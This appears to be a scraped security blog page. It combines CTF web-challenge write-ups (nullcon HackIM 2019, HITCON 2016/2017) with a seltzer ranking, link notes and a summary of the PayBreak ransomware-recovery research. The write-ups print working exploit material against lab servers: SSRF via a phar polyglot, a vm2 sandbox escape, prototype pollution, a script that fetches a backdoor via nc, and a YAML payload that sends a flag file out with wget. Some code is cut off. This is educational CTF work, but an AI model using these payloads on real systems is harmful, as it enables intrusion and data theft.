Kolobyte - Eugene Kolodenker

nullcon HackIM CTF 2019 Web Challenges

HackIM CTF 2019 Scoreboard

I competed this weekend in the nullcon HackIM CTF with my team Shellphish and we ended up solving all the web challenges. We won first place by a few points 😌.

Challenge Writeups:

mime checkr (4 solves)

mime chekr challenge image

Upon entering the website we're given two form submissions. We can check the MIME type of a file, and we can upload a file.


The upload seems to do some checks of the MIME type, image size, file size, and some other stuff, before allowing us to successfully upload. The upload allows us to upload JPEG images that successfully pass all the checks.

File is an image - image/jpeg.The file 8becbebdb0f66ab1ee16b476baab10a1.jpeg has been uploaded.

We were told the file uploaded... but where? Turns out it's in /uploads. This guess can actually be discovered by searching the messages we get from the file upload and realizing the upload script is just copy pasted from a stackoverflow question.

Mime Check

We can test the MIME type of a file with this form. Playing around with it we found out that the MIME checker also takes URLs as an option, and not just local file paths. The form tells tells us if it's an image and what MIME type it is.

File is an image - image/jpeg.

Phar/JPEG Polyglot and Source Discovery

The idea that comes to mind is to upload some sort of file that must pass the JPEG check, and then feed it to the MIME checker. Perhaps the MIME checker is vulnerable to some sort of execution vulnerability? Maybe it does an include of the file it's passed resulting in PHP evaluation? These are stretches, but it's all we got to go off of and hope.

Last year phar files came into style with a Black Hat Conference talk, and some subsequent research.

Phar files are a way to archive PHP code into a format similar to TAR. Using these as references we can craft a phar file that is also a valid JPEG image - and subsequently can be uploaded. PHP by default blocks you from creating a phar file from the command line, so a php.ini has to be created and pointed to by the interpreter.

# php.ini - call interpreter with `php -c . -a`
phar.readonly = 0  

We can create a Phar/JPEG polyglot by using the POC that nc-lp provides.

class AnyClass {}

$jpeg_header_size = 

$phar = new Phar("phar.jpeg");
$phar->setStub($jpeg_header_size." __HALT_COMPILER(); ?>");
$o = new TestObject();
$ file phar.jpeg
phar.jpeg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "Created with GIMP", progressive, precision 8, 10x10, frames 3  

But what do we do with this? We can unarchive the phar by passing phar://./uploads/<our upload hash>.jpeg/test.txt to the getmime function, but that doesn't get us anything of ours executing or doing anything interesting. In order to leverage a phar exploit we need for the phar to end up being executed somewhere, or for us to overwrite a class with a magic method for an object injection attack. For this to be possible we have to know the name of a vulnerable class that is in getmime.php.

We got stuck on this for a while. Out of frustration I decided to check random files hoping there's some sort of hidden file. I tried looking for backup files by adding ~, and .bak to files. I tried looking for some folders such as admin or setup. Eventually, I tried getmime without the .php extension, and lo and behold... a file downloaded.

//ini_set('display_errors', 'On');

class CurlClass {  
  public function httpGet($url) {
    $ch = curl_init();


    $output = curl_exec($ch);

    return $output;

class MainClass {  
  public function __destruct() {
    $this->why = new CurlClass;
    echo $this->url;
    echo $this->why->httpGet($this->url);

// Check if image file is a actual image or fake image
if(isset($_POST["submit"])) {  
  $check = getimagesize($_POST['name']);
  if($check !== false) {
    echo "File is an image - " . $check["mime"] . ".";
    $uploadOk = 1;
  } else {
    echo "File is not an image.";
    $uploadOk = 0;

I didn't know why this worked until after the CTF. I tried to also grab upload without the .php and that did not work. It turns out the intended solution was to find getmime.bak, and the Apache configuration has MultiViews enabled which tries to autocomplete files that don't exist to one that does.

System Recon and SSRF

Okay, so we have the source, we see there's a MainClass and a __destruct. We're in business. We can now craft our phar file from before to do an object injection attack on MainClass by changing the AnyClass to:

class MainClass {  
   public $url = "our url";

When our phar is deserialized, it will trigger an object injection of MainClass and cause it perform a curl request to our specified URL. We have an SSRF vulnerability.

It looks like file:// scheme is supported by curl, so we are able to read file:///etc/passwd by passing
phar://./uploads/<our hash>.jpeg/test.txt to the getmime.php form.

File is an image - image/jpeg. file:///etc/passwd  

Okay, but what do we read? Where can the flag be? Browsing around files didn't find us anything directly in them.

Eventually we checked the /etc/hosts file and found d038b936b122

A teammate pointed out, if we're on the .3 ip, what is on .1 and .2? Perhaps there's something interesting on those IPs.

Using our phar payload to send a request to gets us
b'\xc8\x85\x93\x93\[email protected]\x86\x85\xa3\x83\x88\xa1l\xad\xbd_|][email protected]@\x94\x85'

Well, that's weird. That's definitely python based on the beginning b character signifying it to be a byte string. Searching the first few bytes reveals this to be EBCDIC encoding. Decoding it using US EBCDIC gives us:
Hello /fetch~%ݨ¬@)( me That's not quite right. Using Indian EBCDIC (cp1137) gives us Hello /fetch~%[]^@)( me. Much better, let's fetch that.

Fetching[]^@)( (percent sign encoded), gives us back: b'\xc6\x93\x81\x87\xc0\xd7\xc8\xd7m\xe2\xa3\x99\x85\x81\x94\xa2m\x81\x99\x85m\xa3\xf0\xf0m\xd4\x81\x89\x95\xe2\xa3\x99\x85\x81\x94\xf0\xd0'

Again, decoded from Indian EBCDIC:


babyjs (26 solves)

babyjs challenge image

We're told we can run some JS at /run?js=<code>

So first we need to figure out what's going on by causing some errors. A nice trick is to throw an exception and catch the stack trace.


    at vm.js:1:1
    at ContextifyScript.Script.runInContext (vm.js:59:29)
    at VM.run (/usr/src/app/node_modules/vm2/lib/main.js:208:72)
    at /usr/src/app/server.js:21:20
    at Layer.handle [as handle_request] (/usr/src/app/node_modules/express/lib/router/layer.js:95:5)
    at next (/usr/src/app/node_modules/express/lib/router/route.js:137:13)
    at Route.dispatch (/usr/src/app/node_modules/express/lib/router/route.js:112:3)
    at Layer.handle [as handle_request] (/usr/src/app/node_modules/express/lib/router/layer.js:95:5)
    at /usr/src/app/node_modules/express/lib/router/index.js:281:22
    at Function.process_params (/usr/src/app/node_modules/express/lib/router/index.js:335:12)

So, it turns out reading the stack trace we're running inside of vm2. I know exactly what to do - I found a sandbox escape in this same module last June. That one is patched though, but there's sure to be new ones.

Copy pasting the POC in the latest escape:


We have arbitrary code execution. Now it's just change the payload from whoami to ls to see the list of files and then read out the flag with cat iamnotwhatyouthink.

hackim19{[email protected]_0_h4cker_1}

blog (20 solves)

blog challenge image

In this challenge we're given the ability to post a blog with a title and description.

Inputting a title and description brings us to a page that shows the description. The title doesn't appear to be used.

Navigating to the /admin page gives us an error telling us to show the admin some love. We probably need to somehow navigate to this page with the correct credentials, or to some how exfiltrate it another way.

We can play around with the description to get us XSS, but that won't be of any use, since we'd just be self XSSing ourselves - what good is it to make our own browser pop an alert window? So the next thing to do is to play around with the query parameters in the URL and see if we can get some crashes or errors.


This is the properly formatted request. Works fine and shows a page with the description.


Description as an array. Hangs, and nothing.


No description param gives us:

TypeError: Cannot read property 'toString' of undefined  
      at /usr/src/app/server.js:37:88
      at Layer.handle [as handle_request] (/usr/src/app/node_modules/express/lib/router/layer.js:95:5)
    at next (/usr/src/app/node_modules/express/lib/router/route.js:137:13)
    at Route.dispatch (/usr/src/app/node_modules/express/lib/router/route.js:112:3)
    at Layer.handle [as handle_request] (/usr/src/app/node_modules/express/lib/router/layer.js:95:5)
    at /usr/src/app/node_modules/express/lib/router/index.js:281:22
    at Function.process_params (/usr/src/app/node_modules/express/lib/router/index.js:335:12)
    at next (/usr/src/app/node_modules/express/lib/router/index.js:275:10)
    at SendStream.error (/usr/src/app/node_modules/serve-static/index.js:121:7)
    at emitOne (events.js:116:13)

Nice! We know the backend is executing toString on the description parameter, which is undefined in this case.


Polluting the description object some more, and getting it passed as an array/object gives us:

TypeError: reducedHtml.indexOf is not a function  
    at findESIInclueTags (/usr/src/app/nodesi/lib/esi.js:66:39)
    at processHtmlText (/usr/src/app/nodesi/lib/esi.js:26:9)
    at Object.process (/usr/src/app/nodesi/lib/esi.js:48:16)
    at /usr/src/app/server.js:45:7
    at Layer.handle [as handle_request] (/usr/src/app/node_modules/express/lib/router/layer.js:95:5)
    at next (/usr/src/app/node_modules/express/lib/router/route.js:137:13)
    at Route.dispatch (/usr/src/app/node_modules/express/lib/router/route.js:112:3)
    at Layer.handle [as handle_request] (/usr/src/app/node_modules/express/lib/router/layer.js:95:5)
    at /usr/src/app/node_modules/express/lib/router/index.js:281:22
    at Function.process_params (/usr/src/app/node_modules/express/lib/router/index.js:335:12)

So we seem to be using the nodesi library. What is this? Turns out it's a library for node that implements Edge Side Include.

Reading up on it a bit, ESI seems to be some sort of language that gets parsed and used to mark up webpages. Not sure why the internet needs this on top of all the other mark up languages, but okay.

The nodesi documentation mentions it only supports the include tags to include webpages into the website, so let's give that a try.

http://web3.ctf.nullcon.net:8080/edge?title=1&description=<esi:include src="http://example.com" />

includes example.com.

http://web3.ctf.nullcon.net:8080/edge?title=1&description=<esi:include src="https://web3.ctf.nullcon.net:8080/admin" />

Includes the admin page with our flag:

credz (2 solves)

credz challenge image

Browser fingerprint bypass

We're presented with a login page. Trying admin/admin tells us that we have the correct account, but the wrong cookies.

The source code of the website has a fps.js that creates a client side browser fingerprint by combining some characteristics from the user's browser and hashing the result. This hash is submitted to a background service on the website, and the service sets a cookie with that hash. If we can get the correct cookie, then we can log in as the admin.

The fingerprint consists of a lot of characteristics:

  • navigator.language
  • navigator.userAgent
  • screen.colorDepth
  • getTimezoneOffset()
  • getPluginsString()
  • getCanvasFingerprint()
  • and so on

Most of the fingerprint characteristics have only a relatively small set of possibilities. The biggest challenge is to produce a valid canvas fingerprint. The canvas fingerprint effectively fingerprints a graphics card, and deducing how each graphics card will interact with an image is beyond my expertise.

Luckily there's a hint for us in the website's source code that implies we don't need to know the canvas fingerprint.

<!-- remember me all the time, credz is not what you need luke -->

So it seems we can use the image that says "Credz is not everything you need Luke" as our canvas fingerprint. The rest of the options such as user-agent have to be bruteforced.

Due to the tedious bruteforcing nature of the challenge, we didn't continue attemping it until some hints came out. The hints revealed the user was using the latest Chrome installation on Windows 10.

This simplifies the challenge a lot. After setting up a new Windows 10 virtual machine and freshly installing Chrome, only a few things in the fingerprint have any possible variation.

  • navigator.language - The challenge description says the admin is from India, so their language is probably not the same as mine en-US. We can guess they may be using en-IN, or en-UK, or another of the 22 official languages in India.
  • getTimezoneOffset() - Again, the admin is in India, so their offset to UTC time is different from mine in Boston. UTC to India is -330 minutes apart.
  • getCanvasFingerprin() - We know to use the data from the image provided to us.

Running the script with these things set to en-US, -330, and the image, produced a hash of 2656613544186699742. Setting the cookie to this, and logging in as admin/admin gave us access to the next stage.

git unpack-objects and PHP

We're now presented with a directory listing:

  • admin.php
  • pack-9d392b4893d01af61c5712fdf5aafd8f24d06a10.pack

Trying to open the admin.php gives us not_authorized. Searching what a .pack file is leads us to https://stackoverflow.com/questions/16972031/how-to-unpack-all-objects-of-a-git-repository, it seems to unpack this file we must:

$ git init
$ mkdir test
$ mv pack-9d392b4893d01af61c5712fdf5aafd8f24d06a10.pack test
$ git unpack-objects < test/pack-9d392b4893d01af61c5712fdf5aafd8f24d06a10.pack
$ git fsck --full
notice: HEAD points to an unborn branch (master)  
Checking object directories: 100% (256/256), done.  
notice: No default references  
dangling commit 29e3e14902aa1cc8caf8372c55e59f6720b5619b  
$ git checkout 29e3e14902aa1cc8caf8372c55e59f6720b5619b

With that we find an admin.php - probably the same one on the website.

if($_SESSION['go']) {  
    $sp_php=explode('/', $_SERVER['PHP_SELF']);
    $pageListArray = array('index.php' => "1");

    if($pageListArray [$langfilename]!=1) {
        echo "not_authorized";
        Header("Location: index.php?not_authorized");
    else {
        echo "hackim19{}";
else {  
    echo "you need to complete the first barrier";

It seems that admin.php looks if the string 'index.php' is in the URL route. So we can simply visit /admin.php/index.php and get our flag:


proton (3 solves)

proton challenge image

In proton we're told to go to /getPOST?id=5c51b9c9144f813f31a4c0e2.

MongoDB Object ID Enumeration

I immediately recognized that id as a MongoDB ObjectId due to a previous challenge
from Angstrom 2018 CTF.

MongoDB Object ID Structure

Dissecting our id, 5c51b9c9144f813f31a4c0e2, we have:
timestamp: 0x5c51b9c9
random: 0x144f813f31
counter: 0xa4c0e2

We're told we have to look at the user's previous posts. So, that means decrementing the counter sequentially, and decrementing the timestamp until we find the post.

import requests

url = 'http://web2.ctf.nullcon.net:4545/getPOST?id=%s144f813f31%s'  
time = 0x5c51b9c9  
counter = 0xa4c0e2

for i in range(100):  
    counter = hex(counter - 1)[2:]
    for i in range(1000000):
        time = hex(time - 1)[2:] 
        nurl = url % (time, counter)
        res = requests.get(nurl)
        if 'Not found' not in res.text:
            print(res.text, nurl)
            time = int(time, 16)
            counter = int(counter, 16)
        time = int(time, 16

The script gives us the next stage of the challenge:

(u'Shit MR Anderson and his agents are here. Hurryup!. Pickup the landline phone to exit back to matrix! - /4f34685f64ec9b82ea014bda3274b0df/ ', 'http://web2.ctf.nullcon.net:4545/getPOST?id=5c51b911144f813f31a4c0df')

Homograph attack and prototype pollution

At the new URL we're given the source code to the server running there.

'use strict';

const express = require('express');  
const bodyParser = require('body-parser')  
const cookieParser = require('cookie-parser');  
const path = require('path');

const isObject = obj => obj && obj.constructor && obj.constructor === Object;

function merge(a,b){  
 for (var attr in b){   
   if(isObject(a[attr]) && isObject(b[attr])){
    a[attr] = b[attr];
 return a 

function clone(a){  
  return merge({},a);

// Constants
const PORT = 8080;  
const HOST = '';  
const admin = {};

// App
const app = express();  

app.use('/', express.static(path.join(__dirname, 'views')))

app.post('/signup', (req, res) => {  
  var body = JSON.parse(JSON.stringify(req.body));
  var copybody = clone(body)
      res.cookie('name', copybody.name).json({"done":"cookie set"}); 
    res.json({"error":"cookie not set"})

app.get('/getFlag', (req, res) => {

     var аdmin=JSON.parse(JSON.stringify(req.cookies))

      res.send("You are not authorized"); 


Examining this and running it locally caused a few exclamations of "what...".

What... How is there a const admin and then var аdmin? This should error in JavaScript.

Well, it turns out those are not the same. One has a Cyrillic а, and the other a Latin a. This is known as a homograph attack. This can be discovered by examining the file through hexdump and looking at the raw bytes, or using a text editor and just doing a search of one and noticing the other doesn't get matched.

What... Let's say I can edit the admin const... wouldn't that effect the entire application for the rest of the challenge, and just spit out flags for everybody?

I didn't find the answer to this until after the CTF. I just operated under the assumption that there must be something that I don't understand, or the server is restarted every millisecond to reset the variables. It turned out there was a missing line in the source that was provided to us that deletes the Object.prototype.admin right before sending the flag. So technically, there's a bug here. If somebody sets the admin, and then doesn't get the flags themselves in time, another team can steal the flag.

The server code has some sort of merge function for setting cookies. This sparked my memory about an article on Hacker One about prototype pollution.. In the article holyvier discloses a vulnerability in merge-deep and how the prototype of Object can be polluted. Any attribute can be added to the base Object, which is what const admin = {} is.

Using the POC provided we can repeat the same for this challenge, making sure to consider the homograph Cyrillic admin:

curl -X POST http://web2.ctf.nullcon.net:4545/4f34685f64ec9b82ea014bda3274b0df/signup --header 'Content-Type: application/json' -d '{"name": "hey", "__proto__":{"аdmin":"1"}}'`  
curl http://web2.ctf.nullcon.net:4545/4f34685f64ec9b82ea014bda3274b0df/getFlag -H 'Content-Type: application/json'  


Best Polar Seltzer Flavors Review

Some time ago last year I hosted a party of people to taste test every basic flavor of Polar Seltzer (to the best of my knowledge). This post was meant to be posted sooner and is long overdue - I'm sorry! We tasted most of these clean, sometimes with vodka to see which was the best mixing seltzer.

There's some rankings out there on some other sites. But as far as I can tell, this is the only one done by a committee with a spreadsheet. We attempted to rank them, and here's the details on those 18 flavors:

18) Triple Berry

Chemical taste - definitely not berries. What really kills this though is the after taste - awful.

17) Orange Vanilla

Really bad. This one tastes like the nightmare of orange juice and toothpaste concentrated into some sort of seltzer abomination.

16) Pomegranate

Pomegranate Polar Seltzer Same as Triple Berry, but with a slightly better after taste. Still awful, but slightly better.

15) Black Cherry

Black Cherry Polar Seltzer See pomegranate above. This is an attempt at some sort of berry flavor, but it just tastes like chemicals and has an awful after taste.

14) Cherry Pomegranate

Cherry Pomegranate Polar Seltzer Things start to get a little bit better. We're getting to the bearable flavors. The taste in this one is still very chemical.

13) Blueberry Lemonade

Blueberry Lemonade Polar Seltzer This one can be enjoyable if you want a change. But, it's still not very good.

12) Granny Smith Apple

Granny Smith Apple Polar Seltzer Surprisingly accurate to what Granny Smith apples taste like. Not bad, but not great either. The flavor is perhaps best left to sour candy and not seltzer.

11) Cranberry Lime

Cranberry Lime Polar Seltzer Palatable. Mixes well with vodka. Wouldn't drink this regularly.

10) Cranberry Clementine

Cranberry Clementine Polar Seltzer Decent. Similar to Cranberry Lime. Mixed the best with vodka, but wouldn't drink this one regularly.

9) Strawberry Watermelon

Strawberry Watermelon Polar Seltzer One of the sweetest flavors. It'd make a good summer flavor. Comes with a poor after taste though.

8) Original

Original Polar Seltzer Classic. Clean and crisp. Not much wrong with it, and some may swear by it.

7) Vanilla

Vanilla Polar Seltzer Expected this one to be as gross as Orange Vanilla, but it was surprisingly better. A real shocker.

6) Raspberry Lime

Raspberry Lime Polar Seltzer This is a good daily seltzer. The flavor is bold, but not too bold, and the after taste is good.

5) Lemon

Lemon Polar Seltzer Some people swear by it. Tastes like regular lemon seltzer. The flavor is strong, so if you want a subtler seltzer, this is not the one. But, if you want your seltzer to give you a step in your walk this one's great.

4) Mandarin

Mandarin Polar Seltzer A very welcoming flavor. Palatable by many. It's a good amount of sweetness and subtlety to it while not tasting chemical. There's a slightly poor after taste to it though.

3) Georgia Peach

Georgia Peach Polar Seltzer This is a great flavor. Very similar to Mandarin. It's sweeter than Mandarin and on the juicier side. There's no after taste, which is good.

2) Lime

Lime Polar Seltzer Same as lemon, but more refreshing to some people. It's crisp, and powerful.

1) Ruby Red Grapefruit

Ruby Red Grapefruit Polar Seltzer Here it is. The best. The flavor is near perfect for a seltzer. It's sweet, but not overbearing. It's subtle, but not too subtle. No deplorable after taste. By far voted the best by everybody.

Scores of each flavor

Polar Seltzer Rankings

That's the ranking of the 18 basic flavors. Since this party, Polar has begun selling a lot of seasonal flavors, most of which are very good. Perhaps in the new year I'll host a party with the seasonal flavors.

Lessons Learned and Links #1

My first link roll of the most interesting articles I read and quick lessons learned in the past week or so.

Lessons Learned

  • File system interopability between Linux and Windows is tough

    • Trying to get large hard drives with large and numerous files in them to work between Windows and Linux is truly awful. NTFS and exFAT suffers from numerous limitations, and are poorly supported on Linux. Next time I will try to use ext4 (or another Linux native fs) and try to get them working properly on Windows - or just give up on supporting multiple OSes via USB.
  • A quick way to get a tombstone on Android

    • Sometimes you need a quick tombstone for reference, cat /dev/random | ps or kill -5 `pidof mediaserver` will work for most devices.

A way to self crash Google Hangouts

The other day I accidentally discovered a way to self crash Google Hangouts. I was pasting something off a website to a friend, and ended up freezing my Chrome tab instead.

I've isolated the crash of Google Hangouts to this snippet:

Paste these lines into a Google Hangouts message to crash tab

- must have following text

Upon pasting this in the tab will spike to 100% memory usage and crash itself.

Use case? Not much as the tab cleanly crashes, and it's just a self DOS.

Migrating 0xBU.com website from Ghost to Github Pages Jekyll

I just finished migrating the 0xBU.com website from a self hosted Ghost blog to a managed Github Pages Jekyll blog.

Old Ghost Website: eugenekolo/0xbu-website-deprecated
New Github Pages Website: 0xbu/0xbu.github.io

Some lessons learned from the ~2 years of hosting 0xBU on Ghost:

  • It was hard to get students to update the website. I expected that a more sophisticated framework that allowed backend code writing and a WYSIWYG editor for blog drafting would be ideal. However, student developers found the Ghost blog framework to be daunting, and confusing. A purely static website generator such as Jekyll or Hugo made more sense to them.

  • Self hosting is often more work than expected. Even something as simple as a static website is not stable without effort. A lot of relied upon libraries and services such LetsEncrypt, NGinx, and Docker do not have stable APIs. Changes to their APIs will ricochet into issues elsewhere.

  • Its gotten a lot easier to have free, and secure SSL certificates, but it's still not frustration free. I found that the LetsEncrypt API changed often, and annoyingly. My certificates would often expire, and fail to renew themselves. This was frustrating, and took a couple of hours each time to implement fixes.

I hope that managed purely static hosting will serve me better going forward.

This blog will remain on Ghost for the foreseeable future. A redesign is in the works though.

I'll finish with a thought on university club websites: Is there enough reason for students to post on their club websites instead of their own? I'm not so sure.

How to solve a CTF challenge for $20 - HITCON 2017 BabyFirst Revenge v2

Here's a story how a CTF challenge was solved using $20. There are less expensive solutions (free), but, hey, this works and made us the 4th team to solve it of 8 total in a 1000+ competitor CTF.

Summary and Shoutz

The challenge was basically to get a remote shell using only 4 character commands at a time. We can build a longer command by creating pieces of the command and then listing them in alphabetical order using ls. That command can be saved to a file and then executed using vi<file.

In order to form that command, we had to purchase a $20 alphabetical domain, that chunked up into pieces that vi wouldn't barf on.

Thanks @jeffreycrowell for the vi help, and purchasing the domain.


Description: This is the hardest version! Short enough?

    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 4) {
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);

Relatively straight forward. We get to execute a 4 character shell command in our sandbox.


There are relatively few things you can do with only 4 characters in shell.

  • Writing a file can be accomplished with >, and 3 characters left over.
  • Removing a file can be done with rm<space>, and only 1 character left over.
  • Executing a file can be done with sh< and 1 character left.
  • And of course, we can execute any other <=4 character command such as ls.

So, that gives us roughly 3 character limited primitives: create file, remove file, execute.

def create(file):  
    requests.get(URL + '?cmd=>' + file)

def remove(file):  
    requests.get(URL + '?cmd=rm ' + file)

def run(cmd):  
    requests.get(URL + '?cmd=' + cmd)

That should be enough primitives to create a file with a Remote Code Execution (RCE) command (nc example.com 2000), and execute it.

Getting a command of that length in is difficult when you only have 4 characters, but a nice trick is to create files that form that command and then save those pieces to a file with ls>f. However, ls will sort files by alphabetical order (in our case we discovered the server was running LANG=C, meaning ls sorted by ASCII value). Finally, the file we're writing the output of ls to must not ruin the combined command, as it'll also be written into the output of ls. So we actually have 3 limitations of the kind of command we can create.

  1. RCE command must be split into pieces of up to 3 characters
  2. Those split pieces must sort asciibetically.
  3. The file being written to must not ruin the command when the pieces are combined.

Let's suppose we can create a RCE command that fits those 3 limitations. We still have a problem of joining those pieces into a connected command without newlines as ls will output newline separated into files. We can correct this using some <=3 character vi commands. Those vi commands can be written down as file names, saved using out ls>f trick and then executed using vi<f.

# Run some vi<ls
create(':e}')  # Edit }  
create('gJ')  # Join top 2 lines together  
create('~ZZ')  # Write and close the file  

Note we're naming the file } for a very important reason. vi is able to open files named symbols using only 3 characters :e} whereas non-symbol names require at least 4 :e f and would be over the limit. Additionally, } is at the end of the ascii table and will sort nicely to the end of that command.

The new problem that arises with this method is that now the pieces of the RCE command will be executed as vi commands, because they are included in the ls being piped to vi. So, that makes us have another limitation:

  1. The split RCE command pieces must not stop vi's joining the pieces.

Can you come up with an answer that fits those 4 limitations? Here's what I got:

# Create the pieces of the command `nch h11h12h2hh.im mon>z;`. The extra 'h' in 'nc'
# will be removed later
for fff in ["\ n", "c", "h\ ", "h11", "h12", "h2", "hh.", "i", "m\ ", "mo", "n\>", "z\;"]:  

The URL that works in splitting into 3 character pieces, sorting properly, and not break vi is h11h12h2hh.im, well it turns out it's $20 and was available.

Actually, that command still breaks vi. The 'c' file will be created, and executed as a command in vi. Unfortunately, this command stops the joining process - we must remove it. We can do that by appending an 'h' to the command (or any other letter really), and then searching for it and deleting it using a vi command.

# Clean up the 'h' from the nc command

Once we have a file named } that contains nc h11h12h2hh.im mon>z; we can simply execute that file with sh<}, transfer a nice backdoor script into our sandbox, and then execute it with sh<z.


Full solution

#!/usr/bin/env python
import requests  
import os  
import sys

URL = ''

def create(file):  
    requests.get(URL + '?cmd=>' + file)

def remove(file):  
    requests.get(URL + '?cmd=rm ' + file)

def run(cmd):  
    requests.get(URL + '?cmd=' + cmd)

def reset():  
    requests.get(URL + '?reset=1')


# Create the pieces of the command `nch h11h12h2hh.im mon>z;`. The extra 'h' in 'nc'
# will be removed later
for fff in ["\ n", "c", "h\ ", "h11", "h12", "h2", "hh.", "i", "m\ ", "mo", "n\>", "z\;"]:  

# Put the pieces in the '}' file

# Remove anything 'vi' doesn't like and crashes on

# Run some vi<ls
create(':e}')  # Edit }  
create('gJ')  # Join top 2 lines together  
create('~ZZ')  # Write the file

run('ls>l')  # Trick to make vi<ls only be 4 characters  
for _ in range(13):  

# Clean up the 'h' from the nc command

# Let the script finish making the exploit file, and then execute it

Site Updates

  • Added commenting to posts.
  • Added an All Posts list to the side bar.
  • Improved mobile.
  • Some behind the scenes improvements

PayBreak - Generically recovering from ransomware including WannaCry/WannaCryptor

Recently I worked on some research with colleagues at Boston University (Manuel Egele, William Koch) and University College London (Gianluca Stringhini) into defeating ransomware. The fruit of our labor, PayBreak published this year in ACM ASIACCS, is a novel proactive system against ransomware. It happens to work against the new global ransomware threat, WannaCry. WannaCry is infecting more than 230,000 computers in 150 countries demanding ransom payments in exchange for access to precious files. This attack has been cited as being unprecedented, and the largest to date. Luckily, our research works against it.

PayBreak works by storing all the cryptographic material used during a ransomware attack. Modern ransomware uses what's called a "hybrid cryptosystem", meaning each ransomed file is encrypted using a different key, and each of those keys are then encrypted using another public encryption key, with the private decryption key held by the ransomware authors. When ransomware attacks, PayBreak records the cryptographic keys used to encrypt each file, and securely stores them. When recovery is necessary, the victim retrieves the ransom keys, and iteratively decrypts each file.

By having PayBreak installed prior to an infection, recovery from ransomware attacks is possible at negligible CPU and RAM overhead.

Recovering from WannaCry Ransomware

At this point, I think I've reverse engineered and researched something like 30 ransomware families, from over 1000 samples. Wannacry isn't really much different than every other ransomware family. Those include other infamous families like Locky, CryptoWall, CryptoLocker, and TeslaLocker.

They all pretty much work the same way, including Wannacry. Actually, this comic sums up the ransom process the best I've seen. Every successful family today encrypts each file for ransom with a new unique "session" key, and encrypts each session key with a "public" ransom key making it irrecoverable without the matching "private" key held closely by ransomware racketeers. Those session keys are generated on the host machine. This is where PayBreak shims the generation, and usage of those keys, and saves them. Meaning, the encryption of those session keys by the ransomware's public key is pointless, and defeated.

Custom AES by WannaCry

The PayBreak system doesn't rely on any specific algorithm, or cryptographic library to be used by ransomware. Actually, Wannacry implemented, or at least, statically compiled its own AES-128-CBC function. PayBreak can be configured to hook arbitrary functions, including that custom AES function, and record the parameters, such as the key, passed to it. However, a simpler approach in this case was to hook the Windows secure pseudorandom number generator function, CryptGenRandom, which the ransomware (and most others) use to create new session keys per file, and save the output of the function calls.

Recorded Keys

Recovering files is simply testing each of the recorded session keys with the encrypted files, until a successful decryption. Decrypting my file system of ~1000 files took 94 minutes.

Encrypted: Desert.jpg.WNCRY
Key used by Wannacry: cc24d9c8388fa566456ccec745e009c8
Decrypted: Desert.jpg

Thanks @jeffreycrowell for sharing a sample with me.
Full paper can be found here: https://eugenekolo.com/static/paybreak.pdf
SHA256 Hash of Sample: 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c
WannaCry Custom AES: https://gist.github.com/eugenekolo/fe229be2a4230cf8322bf5537e291812

Hitcon CTF 2016 Writeups


Secure Posts 1

Web 50

Here is a service that you can store any posts. Can you hack it?

Secret Posts Manager

We're given the source code for this webpage: https://gist.github.com/eugenekolo/2bb4cf5c8ef7337a7d1c4e098fdcdfb2


It's fairly straight forward of an app. It takes your post, saves it with your session using a secret key. And for every new post, it appends to the previous posts. It additionally allows you to store the posts as either JSON, or YAML. The code is a bit more confusing, and seems to maybe allow you to use Pickle or eval, but that's actually useless/unimportant.

At first glance, I spent a lot of time trying to figure out how to do a YAML Deserialization attack that I read up a little while back on: https://access.redhat.com/blogs/766093/posts/2592591. However, upon further inspection, it just simply isn't possible due to the way the app does serialization and deserialization.

Essentially the code boils down one of two routes, /, or /post. Both start with load_posts(), which will essentially either fail or do yaml.load(). Typically, this would be dangerous, however the data that it's going to unload is completely uncontrollable by us do to it being tied to the session, and the session being integrity controlled by the secret_key.

We have some control over the session through the / route. However, what that route ends up doing is essentially taking our dirty input, and putting it into a dictionary structure. It then serializes that dictionary using yaml.dump(). Now, what we have instead of our dangerous input is just a plain old harmless serialized dictionary that points to some strings. One of those strings may happen to look dangerous, but is still just a string and it will not be parsed as anything else.

So we're out of luck here for doing anything involving deserialization.

There's one other area where user input seems to go:

return render_template_string(template.format(name=name), **args)  

Hmm... I wonder what Google shows up for 'template format injection flask' - https://hackerone.com/reports/125980

Aha! A bug bounty by the same creator of the challenge, orange, lol!

Testing his same test, {{'7'*7}} into the name field, gives us exactly what he said it would give 7777777.

So, simply changing that to {{config}} is going to render the config module as a string, and output it to us:

<Config {'SESSION_COOKIE_SECURE': False, 'DEBUG': False, 'SESSION_COOKIE_NAME': 'session', 'JSONIFY_PRETTYPRINT_REGULAR': True, 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 'PREFERRED_URL_SCHEME': 'http', 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SERVER_NAME': None, 'SEND_FILE_MAX_AGE_DEFAULT': 43200, 'TRAP_HTTP_EXCEPTIONS': False, 'MAX_CONTENT_LENGTH': None, 'A': <datetime.tzinfo object at 0x7f3b41b891d0>, 'TRAP_BAD_REQUEST_ERRORS': False, 'JSON_AS_ASCII': True, 'TESTING': False, 'PROPAGATE_EXCEPTIONS': None, 'SESSION_COOKIE_DOMAIN': None, 'USE_X_SENDFILE': False, 'APPLICATION_ROOT': None, 'SESSION_COOKIE_HTTPONLY': True, 'LOGGER_NAME': 'post_manager', 'SESSION_COOKIE_PATH': None, 'SECRET_KEY': 'hitcon{>_<---Do-you-know-<script>alert(1)</script>-is-very-fun?}', 'JSON_SORT_KEYS': True}>  

SECRET_KEY is the flag, and the actual session secret key of the website, see below for why that's interesting.

Secure Posts 2

Web 150

Here is a service that you can store any posts. Can you hack it?

Same exact website as as the first part in 'Secure Posts'.

It's important to understand how the app works, so look at the Examination section of Secure Posts 1 to understand how the app works.

From the previous challenge we have the secret key of the website. That means we actually have full control of the data that the app will try to deserialize. Without the secret key, we could not edit the session cookie without violating the signature check. But, now we have it, so it's free game!

import yaml  
from flask.sessions import SecureCookieSessionInterface

key = r"hitcon{>_<---Do-you-know-<script>alert(1)</script>-is-very-fun?}"

class App(object):  
    def __init__(self):
        self.secret_key = None

def load_yaml(data):  
    import yaml
    return yaml.load(data)

exploit = u"some_option: !!python/object/apply:subprocess.call\n \  
  args: [wget eugenekolo.com/$(cat flag2)]\n \
  kwds: {shell: true}\n"

exploit = {'post_type': u'yaml',  
           'post_data': exploit}

